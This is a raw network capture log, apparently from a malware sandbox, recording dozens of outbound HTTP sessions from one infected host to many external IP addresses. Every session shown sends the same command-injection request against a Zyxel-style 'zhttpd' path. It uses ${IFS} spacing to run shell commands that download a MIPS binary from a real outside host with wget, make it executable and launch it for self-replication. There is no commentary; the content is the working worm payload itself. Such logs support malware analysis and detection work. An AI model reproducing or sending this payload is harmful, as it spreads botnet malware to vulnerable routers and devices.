                                          Jan 14, 2024 15:46:05.789073944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1880192.168.2.2359794162.23.255.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789097071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1881192.168.2.2359588112.40.58.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789120913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1882192.168.2.2343472136.141.174.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789144039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1883192.168.2.2356640223.61.14.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789215088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1884192.168.2.2356008200.228.66.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789247990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1885192.168.2.234635463.75.254.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789284945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1886192.168.2.2348896182.151.89.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789323092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1887192.168.2.2354094130.135.111.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789355993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1888192.168.2.2355388152.171.116.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789402962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1889192.168.2.2336232171.20.100.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789453983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1890192.168.2.234832840.248.109.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789474010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1891192.168.2.2342274216.3.127.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789509058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1892192.168.2.2350186172.120.168.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789555073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1893192.168.2.235464042.240.221.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789581060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1894192.168.2.2357284183.17.49.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789634943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1895192.168.2.2350442104.204.12.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789647102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1896192.168.2.233888258.128.245.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789695024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1897192.168.2.2336370186.92.158.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789762020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1898192.168.2.2337842124.25.4.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789803982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1899192.168.2.233341236.146.99.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789836884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1900192.168.2.2353926193.193.250.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789854050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1901192.168.2.2356474204.41.39.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789876938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1902192.168.2.23551945.4.122.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789941072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1903192.168.2.2349192123.1.157.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.789954901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1904192.168.2.2339574126.32.5.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790004015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1905192.168.2.2339868152.196.222.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790034056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1906192.168.2.2352224145.148.2.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790071964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1907192.168.2.2338630192.205.212.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790102959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1908192.168.2.23411568.199.147.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790134907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1909192.168.2.234881867.229.78.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790158033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1910192.168.2.2335756203.69.74.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790189028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1911192.168.2.2351444219.85.164.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790222883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1912192.168.2.2338912121.5.29.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790283918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1913192.168.2.2336874173.224.64.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790297031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1914192.168.2.2353428146.65.128.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790360928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1915192.168.2.2338666188.175.47.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790493011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1916192.168.2.2354818210.207.36.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790518045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1917192.168.2.235460265.187.33.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790568113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1918192.168.2.2348868153.88.132.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790607929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1919192.168.2.2358776150.89.161.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790616035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1920192.168.2.233308459.49.233.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790640116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1921192.168.2.2338644147.170.156.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790668011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1922192.168.2.233430696.91.218.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790725946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1923192.168.2.233617485.90.205.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790746927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1924192.168.2.2337566104.229.35.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790790081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1925192.168.2.234406095.39.62.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790832996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1926192.168.2.235435439.201.169.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790862083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1927192.168.2.2344568222.16.144.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790890932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1928192.168.2.235997276.108.42.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790909052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1929192.168.2.233938097.154.39.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790950060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1930192.168.2.2339732184.60.96.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.790991068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1931192.168.2.236016217.103.192.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791038990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1932192.168.2.2333790160.53.106.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791068077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1933192.168.2.23373588.41.165.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791100979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1934192.168.2.2346818166.13.6.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791140079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1935192.168.2.235675027.23.175.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791166067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1936192.168.2.235501491.157.132.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791208982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1937192.168.2.2358032158.211.14.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791237116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1938192.168.2.233811886.142.11.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791269064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1939192.168.2.2351716167.56.40.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791301012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1940192.168.2.235533099.169.64.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791337013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1941192.168.2.234525878.123.118.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:05.791380882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1942192.168.2.2336408152.156.147.10443
                                          TimestampBytes transferredDirectionData
